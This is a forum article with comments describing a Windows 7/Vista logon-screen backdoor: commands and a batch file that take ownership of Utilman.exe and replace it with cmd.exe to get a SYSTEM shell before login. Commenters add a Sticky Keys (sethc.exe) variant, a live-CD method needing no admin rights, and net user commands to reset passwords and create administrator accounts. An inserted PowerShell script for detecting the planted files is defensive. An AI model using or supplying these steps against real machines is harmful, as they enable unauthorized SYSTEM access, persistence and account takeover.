Windows 7 and Vista Backdoor - Submitted By: Phast 2011-04-08 09:42:36
If you have any experience with Windows 7 or Vista, you will know that the built-in Administrator account is disabled by default. In XP, a simple backdoor could be had by hitting Ctrl-Alt-Delete twice at the welcome screen, which brings up the classic logon prompt, and logging into an unprotected (blank-password) Administrator account. Because this is not possible in Windows 7 or Vista, I looked for a different way in.
When you come to the logon screen of Windows 7, there are three doors that lead to different places:
The user account: clicking it brings you to a password prompt if the account is password protected. Nothing here...
The shutdown button: gives you the option to restart, shut down, or put the computer to sleep. Another dead end...
The Ease of Access button: offers several options that improve the usability of Windows 7 or Vista. Those options have to live somewhere under the WINDOWS folder... let's go take a peek.
After a little research, I found that the executable behind the Ease of Access button is "Utilman.exe" in the System32 folder of WINDOWS, and that Windows launches it from the logon screen before anyone has logged on.
Light bulb moment.
What if we replaced that utility with a command prompt?
So I tried to replace it with a different executable. Unfortunately, I could not rename or delete it: the file is owned by TrustedInstaller, and even members of Administrators only get read and execute permission on it. I tried my favorite unlocking utility, Unlocker, but that program is not compatible with Windows 7. So I researched a better way online, and found the command line that lets an administrator take ownership of the file, and voila! An unlocked Utilman.exe.
Here are the steps to making the backdoor (the paths are c:\windows\system32\..., with backslashes):
1. Take ownership of the Utilman.exe file.
takeown /f "c:\windows\system32\Utilman.exe"
2. Modify the Access Control List on the file and grant the Administrators group full access to it.
icacls "c:\windows\system32\Utilman.exe" /grant administrators:F
3. Rename Utilman.exe, so that Windows never calls the original again (and so that you keep a backup you can restore from).
rename c:\windows\system32\Utilman.exe Utilman2.exe
4. Copy the command line executable within the same folder under a generic name, so that the original cmd.exe is left untouched. I used cmd5.exe.
copy c:\windows\system32\cmd.exe c:\windows\system32\cmd5.exe
5. Rename the copy to Utilman.exe, which substitutes the command prompt for the Ease of Access utility.
rename c:\windows\system32\cmd5.exe Utilman.exe
And you're done! Make sure you run all of these commands from an elevated prompt: right-click Command Prompt and select "Run as administrator". Without administrator rights, takeown and icacls will fail, which is why this is a backdoor you plant after you already have access, not a way of getting it in the first place.
I took the liberty of writing a batch file that, when run as admin, performs all of these steps in the blink of an eye. To create your own, open a new .txt file in Notepad and copy these commands into it, one per line:
takeown /f "c:\windows\system32\Utilman.exe"
icacls "c:\windows\system32\Utilman.exe" /grant administrators:F
rename c:\windows\system32\Utilman.exe Utilman2.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\cmd5.exe
rename c:\windows\system32\cmd5.exe Utilman.exe
Save as:
<whatever you want here>.bat
Right-click it and choose "Run as Administrator".
To test it, reboot your computer and, when it comes to the logon screen, click the Ease of Access button instead of logging in. It should present you with a command shell running as SYSTEM, because winlogon launches Utilman.exe before any user has logged on.
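The flip side of the technique above is finding it on a machine you administer. The following audit script is an added example, not part of the original article or of Enigma Group's material. It assumes PowerShell 4 or later (for Get-FileHash) and that the planted file is a byte-for-byte copy of cmd.exe, which is what the copy/rename steps above produce; the two metadata checks (file owner and version description) do not depend on that assumption. Run it from an elevated prompt.

```powershell
# Added audit example (not from the original article). Looks for the backdoor
# described above: copies of cmd.exe planted under other names in System32,
# and in particular the accessibility binaries that Windows launches as SYSTEM
# from the logon screen (Utilman.exe, and sethc.exe for Sticky Keys).
# Assumption: the planted file is hash-identical to cmd.exe, as it is when
# installed with copy/rename. A patched or recompiled binary would still be
# caught by the owner/description checks below, but not by the hash check.

$system32 = Join-Path $env:SystemRoot 'System32'
$cmdPath  = Join-Path $system32 'cmd.exe'
$cmdHash  = (Get-FileHash -Algorithm SHA256 $cmdPath).Hash

# 1. Any .exe in System32 whose content is identical to cmd.exe, other than
#    cmd.exe itself. This also finds leftovers such as the article's cmd5.exe.
$clones = Get-ChildItem -Path $system32 -Filter '*.exe' -File |
    Where-Object { $_.Name -ne 'cmd.exe' } |
    Where-Object { (Get-FileHash -Algorithm SHA256 $_.FullName).Hash -eq $cmdHash }

if ($clones) {
    Write-Warning 'Copies of cmd.exe found under other names in System32:'
    $clones | ForEach-Object { Write-Warning "  $($_.FullName)" }
} else {
    Write-Output 'No hash-identical copies of cmd.exe found in System32.'
}

# 2. Metadata checks on the logon-screen accessibility binaries. The genuine
#    files are owned by NT SERVICE\TrustedInstaller and carry their own version
#    description; a planted cmd.exe reports "Windows Command Processor" and,
#    after takeown, is owned by an administrator or the Administrators group.
$accessibilityBinaries = @('Utilman.exe', 'sethc.exe')

foreach ($name in $accessibilityBinaries) {
    $path = Join-Path $system32 $name
    if (-not (Test-Path $path)) { continue }

    $owner = (Get-Acl $path).Owner
    $desc  = (Get-Item $path).VersionInfo.FileDescription

    $suspicious = ($desc -like '*Command Processor*') -or
                  ($owner -notlike '*TrustedInstaller*')
    $status = if ($suspicious) { 'SUSPICIOUS' } else { 'ok' }

    '{0,-12} {1,-10} owner={2,-30} description={3}' -f $name, $status, $owner, $desc
}

# 3. Backups left behind by the rename step (the article uses Utilman2.exe).
Get-ChildItem -Path $system32 -Filter 'Utilman*.exe' -File |
    Where-Object { $_.Name -ne 'Utilman.exe' } |
    ForEach-Object { Write-Warning "Possible renamed original: $($_.FullName)" }
```

If the script flags a file, restore the original from the backup made in step 3 (or from installation media) rather than just deleting the planted copy, otherwise the Ease of Access or Sticky Keys feature stays broken at the logon screen.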
Comment By: Phast 2011-04-11 21:14:40
For some reason it removed my forward slashes in the commands. If you are at all familiar with the structure of the commands, replace them at your own discretion in your batch files.
Comment By: Ryuske 2011-04-12 21:36:38
So this isn't exactly a backdoor, as in order to do this you must already have admin rights.
Unless I missed something?
Comment By: Phast 2011-04-15 09:58:14
Depends on what you want to call a backdoor. I was under the assumption that a backdoor was an opening left by an attacker once a system was breached. If you have access to a computer with the proper operating system, you can install this "backdoor" to gain access to the system if you have been locked out.
Comment By: dnatrixene135 2011-07-11 14:49:22
It's more like a "just-in-case" type of login. Actually in XP sometimes the admin account is password protected.
Comment By: niteshade 2011-08-07 21:17:48
I assume that the reason why you didn't include directory separators in the Windows paths was a countermeasure against skids, right? Great hack.
Comment By: Phast 2011-08-13 10:29:53
Heh don't give me that much credit. The submitter removed my directory separators, as you can see by my first comment. At first I thought that was a bad thing, but now I view it in a different light, thanks to you.
Also, you can use this hack to not only enable the typically disabled administrator account on Windows 7, but also CREATE a user, and ADD him to the local administrators group, and pwn from there.
I had to do that just the other day, when some smartass enabled the administrators account (the proper way), put a password on it, then disabled it again.
Comment By: dustinr1985 2011-09-26 09:11:57
You did miss something here: if you know the user name on the computer you can use net user *username* *whateverpassword* you want and change their password, hence the backdoor part.
ex: net user user1 newpass
user1's password will now be newpass
You can also take ownership of the shiftkeys file that's stored in the sys32 folder, delete it, copy cmd and rename it to the shiftkeys file's original name, and then at the login just hit Shift 5 times and you get a command prompt.
I'm SURE this has been addressed somewhere on this website before; however, if this comment needs to be removed feel free to take it down.
Comment By: Phast 2011-11-11 09:21:08
I actually like the shift keys idea better. Little less obvious than an ease of access that pulls up a weird command line for no reason.
Comment By: vict0r 2012-01-18 15:45:08
Utilman.exe & Sethc.exe (for Sticky Keys) are both useful for backdoor purposes.
Methodology
===========
1. Boot your machine with a live Ubuntu (or other open source) CD
2. Mount the system drive if it is not mounted, so you can see the WINDOWS/System32 directory
3. Go and replace Utilman.exe with cmd.exe [don't forget to take a backup of Utilman.exe]
OR
copy cmd.exe sethc.exe [enter]
4. Reboot the machine, press Shift thrice and voila, cmd will be there to welcome you.
5. Use the command
net user [username] [password] [enter]
to reset the password. For example
net user Administrator P@ssword12#
by: vict0r